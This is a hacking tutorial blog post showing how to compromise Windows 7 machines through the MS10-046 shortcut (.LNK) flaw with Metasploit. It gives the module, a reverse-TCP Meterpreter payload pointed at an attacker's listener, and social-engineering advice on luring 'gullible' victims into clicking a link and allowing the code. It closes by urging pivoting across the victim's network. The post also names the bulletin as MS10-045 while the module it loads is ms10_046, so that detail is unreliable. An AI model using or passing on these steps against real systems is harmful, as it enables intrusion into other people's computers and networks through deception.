How to Hack Windows 7: Sending Vulnerable Shortcut Files
Welcome back, my greenhorn hackers!
After the disaster that was Windows Vista and the limited and reluctant adoption of Windows 8 and 8.1, Windows 7 has become the de facto standard operating system on the desktop/client.
Although the most valuable information to the hacker resides on servers, sometimes the best way to get to a fortified server is through a vulnerable client on the same network with inexperienced and gullible users and numerous insecure applications.
Beginning with this tutorial, I will be showing you numerous ways to attack and exploit Windows 7. I already have a tutorial on sending a malicious link that can be used against Internet Explorer 8 on Windows XP, Vista, Server 2003, Server 2008 and Windows 7, and another on how to crash Windows 7 by creating an infinite loop.
Microsoft finally got the message that they need to make their operating systems more secure and they have done so. Attacking their operating systems has become increasingly difficult. Fortunately, for the hacker, the same cannot be said for their browser, Office Suite, and other apps, as well as all of the third-party applications that reside on the typical client system and, sometimes—on the server.
We will focus on attacking those vulnerabilities in the browser and the apps on Windows 7 in order to gain access and own those systems in the following "How to Hack Windows 7" series of tutorials. In this installment, we'll be sending a malicious link thanks to a vulnerability in the handling of Windows Shortcut files.
Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing:
- bt > msfconsole
You will be greeted by a screen like this.
In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let's load it by typing:
- msf > use windows/ms10_046_shortcut_icon_dllloader
Now that we have it loaded in the Metasploit framework, let's get more info on this exploit to better understand what we will be doing.
- msf > info
As we can read at the bottom, the developer of the exploit writes:
"This module exploits a vulnerability in the handling of Windows Shortcut file (.LNK) that contain an icon resource pointing to a malicious DLL."
Essentially, we will be creating a shortcut file, that when clicked on by a gullible end user, will allow the execution of our malicious code.
With the exploit loaded and the knowledge of how it works, let's set the required options. First, set the Payload. My preference is the great and powerful (sounds like Oz) Meterpreter.
- set PAYLOAD windows/meterpreter/reverse_tcp
Now we need to set the IP our our system as LHOST:
- set LHOST 192.168.1.111
Once we have these options set, we can simply type "exploit" to generate the exploit. Unlike some of our other remote exploits, what we've done here is generate a link and a server to host that link.
As you can see where I have highlighted in the above screenshot, Metasploit has generated the exploit and then started a server to host the exploit. Our job now is to get the victim to click on the link.
We need to be creative here. This is the social engineering part of this hack. One way or another, we need to induce the victim to click on our link.
We've all seen those spam emails that claim to help us acquire a small fortune by working at home, grow our penises to proportions that would make a stallion envious, and apply for millions of dollars in unclaimed bank funds. Or, it could simply be something as innocent-sounding as watching a hilarious cat video. If we click on any of the links, we're likely to become a victim of a hack like this one.
You might say "no one would be so gullible," but in reality, there are billions of such gullible people. Some of the greatest hacks in history (RSA and NY Times come immediately to mind) have been accomplished this way. When all is said and done, I believe that the hackers who gained access to the credit cards numbers at Target gained their foothold inside that network by getting one unwitting employee to click on a link such as this.
So...we have the link and the victim clicks on it like in the screenshot below.
Now, here is the crucial and tricky part...
The victim will be greeted by a security warning. The victim must "Allow" the code to run. Many, or probably most users will know better than to "Allow," but it only requires one user of thousands to compromise an entire network. Make the link sound compelling enough and SOMEONE will click "Allow," especially if it comes from someone they know or think they know and trust.
When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. In my experience, even on an unpatched Windows 7 system, it does not always work, so be persistent. Persistence and creativity are key attributes of a successful hacker.
If we have done everything correctly and the victim is vulnerable and naive, we will be greeted by the meterpreter prompt!
Now that we have control of this Windows 7 system, we can do just about anything we want with this computer. Far more importantly, if this machine is on a large network, we can pivot from it to take control of any other system on the network.
Keep coming back, my greenhorn hackers, for more on hacking Windows 7 systems.